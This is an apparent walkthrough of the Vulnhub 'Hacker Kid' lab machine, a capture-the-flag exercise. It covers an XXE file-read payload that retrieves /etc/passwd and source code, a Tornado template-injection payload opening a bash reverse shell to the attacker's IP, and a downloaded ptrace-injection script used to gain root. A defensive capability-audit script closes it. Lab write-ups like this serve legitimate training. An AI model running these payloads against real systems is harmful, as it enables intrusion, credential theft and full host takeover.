This is the Hacker Kid Vulnhub walkthrough. Here’s what you will learn from this walkthrough. One thing you will learn is how to do binary analysis for Linux privilege escalation, but that is all I will give away. This is an excellent OSCP-like box you can use to practice for the OSCP exam for free.

What is an OSCP-like box?

An OSCP-like box is one you might see on the Offensive Security OSCP exam. It is more realistic in its intended exploitation than boxes that rely on less practical methodologies such as steganography, cracking complex hash sequences, etc. In a nutshell, it means that the box is something you could expect to see in real life. You won’t find mind puzzles and abstract sudoku-like challenges in these boxes. Personally, I find those to be annoying and prefer OSCP-like boxes in general.

Want to learn more ethical hacking? I highly recommend buying my book made for beginners to Pentesting Become An Ethical Hacker. Check the price on Amazon.


Here’s What You Need

Initial Enumeration

We kick off the initial enumeration stage with a simple nmap scan of the target using the command nmap -sC -sT -sV -p- 10.0.50.63 (default scripts, TCP connect scan, version detection, all ports) and find some interesting results.

It looks like SSH is open, but we will focus on the other open ports. There are two open web services, on port 80 and port 8080. Let’s start with 80.

Web Enumeration

For the hackerkid web enumeration step you can use tools like ffuf, dirbuster, dirb, gobuster, and dirsearch. Looking at the page source of the main page we see there is a note: TO DO: Use a GET parameter page_no to view pages. This could mean a parameter we should fuzz for vulnerabilities, or that there is another page to be seen under a certain id.

I find that for simple fuzzing of a page_no parameter the Sniper attack type in Burp Suite Intruder is perfect, since we just need to supply numbers sequentially starting with 1 and incrementing by 1 each step.

The page found this way reveals a new subdomain, hackers.blackhat.local, which we need to add to the /etc/hosts file. Then, digging for more information with the dig hackers.blackhat.local @hackeridIP command (hackeridIP being the target’s IP), we find another one to add: hackerkid.blackhat.local. Let’s add that one too.

Hacker Kid Web Exploitation

At first glance the web server is sending back an XML response. This suggests an XML-related vulnerability may be available. By submitting the entity value file:///etc/passwd, the server resolves it for us and returns the contents of that remote file.

Requesting other files this way is not going well for me, so I check the sahet user’s .bashrc file. That fails too. If the web app is using PHP, instead of file:// you can use the PHP filter wrapper php://filter/convert.base64-encode/resource= to read internal files. Upon decoding the returned base64 string we get some credentials.

Get Your First Shell

Getting a shell on the hackerkid machine starts from the web app’s XXE (XML External Entity) vulnerability, which gave us the credentials above. The shell itself comes from server-side template injection (SSTI) in the underlying web framework, Tornado; see https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#tornado-python .

To do so the steps are:

  1. In the URL, as the value of the name parameter (/?name=), put in the payload {% import os %}{{os.system('bash -c "bash -i >& /dev/tcp/kaliIP/1234 0>&1"')}} (kaliIP being your attacking machine’s IP).
  2. Use Burp to intercept the request, send it to Decoder, then URL-encode everything after the =.
  3. Start a new netcat listener in Kali Linux on port 1234.
  4. Paste the encoded request into Burp Repeater and send it to get a new shell back on your listener.

Stabilize Your Shell

To upgrade the current shell we can spawn a pty with the installed Python and then turn off terminal echo so that every command stops being printed twice.

/usr/bin/python2.7 -c "import pty;pty.spawn('/bin/bash')"
stty -echo

Vulnhub:Hackerkid Privilege Escalation

For the Linux privilege escalation part of the hackerkid box you can use any automated scanning tool such as LinEnum or Linux Smart Enumeration. Sooner or later you will find that the path to root is through the getcap command. The installed Python binary has been granted a capability that lets it interfere with processes owned by root (the exploit below takes a root process ID as its argument). To list the capabilities of binaries installed on the box you can use the /sbin/getcap -r / 2>/dev/null command.

The next few steps involve downloading the exploit, moving it to the target, finding a root process to supply to the exploit, and executing it to become root. The first two commands run on Kali, the rest on the target.

wget hxxps://gist.github.com/wifisecguy/1d69839fe855c36a1dbecca66948ad56/raw/e919439010bbabed769d86303ff18ffbacdaecfd/inject.py -O funny.py   # on Kali: fetch the exploit
php -S 0.0.0.0:80                                  # on Kali: serve it over HTTP
wget http://10.0.50.50/funny.py -O funny.py        # on the target: pull it from Kali
ps -eaf | grep root                                # on the target: pick a root-owned PID
/usr/bin/python2.7 funny.py 571                    # on the target: inject into that PID (571 here)

With that we are now root.
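The getcap check above is exactly what a defender should be running before an attacker does. As an added example (not part of the original walkthrough or the box), the script below parses getcap -r output, flags binaries with capabilities that break the privilege boundary, and flags any capability on a scripting interpreter; the sample listing is constructed, and giving python2.7 cap_sys_ptrace is an assumption, since the walkthrough never names the capability.

```python
import re
import shutil
import subprocess

# Capabilities that let a binary cross its own privilege boundary.
DANGEROUS = {"cap_sys_ptrace", "cap_setuid", "cap_setgid", "cap_dac_override",
             "cap_dac_read_search", "cap_sys_admin", "cap_sys_module"}
# Any capability on one of these is attacker-controllable by design.
INTERPRETERS = ("python", "perl", "ruby", "php", "node")

# Constructed sample of `getcap -r / 2>/dev/null` output (older libcap "path = caps" form).
# The cap_sys_ptrace on python2.7 is assumed, not taken from the walkthrough.
SAMPLE = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python2.7 = cap_sys_ptrace+ep
/usr/sbin/arping = cap_net_raw+ep
"""

def parse_getcap(output):
    """Return {path: set(cap names)}; accepts both the older '/p = cap_a,cap_b+ep'
    and the newer libcap '/p cap_a,cap_b=ep' output forms."""
    result = {}
    for line in output.splitlines():
        line = line.strip()
        if not line:
            continue
        path, _, rest = line.partition(" ")
        rest = rest.lstrip("= ")
        caps = re.split(r"[+=]", rest, maxsplit=1)[0]   # drop the +ep / =ep flag set
        result[path] = {c for c in caps.split(",") if c}
    return result

def find_risky(caps_by_path):
    """Return [(path, reason)] for binaries a defender should review.
    Fix is `setcap -r <path>` (or a dedicated, non-interpreter helper)."""
    findings = []
    for path, caps in sorted(caps_by_path.items()):
        bad = sorted(caps & DANGEROUS)
        if bad:
            findings.append((path, "dangerous capability: " + ",".join(bad)))
        elif path.rsplit("/", 1)[-1].startswith(INTERPRETERS):
            findings.append((path, "capability on interpreter: " + ",".join(sorted(caps))))
    return findings

def audit_live():
    """Run getcap on this Linux host and return findings; [] if getcap is absent."""
    getcap = shutil.which("getcap")
    if not getcap:
        return []
    out = subprocess.run([getcap, "-r", "/"], capture_output=True, text=True).stdout
    return find_risky(parse_getcap(out))

if __name__ == "__main__":
    for path, reason in find_risky(parse_getcap(SAMPLE)) + audit_live():
        print(f"{path}: {reason}")
```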
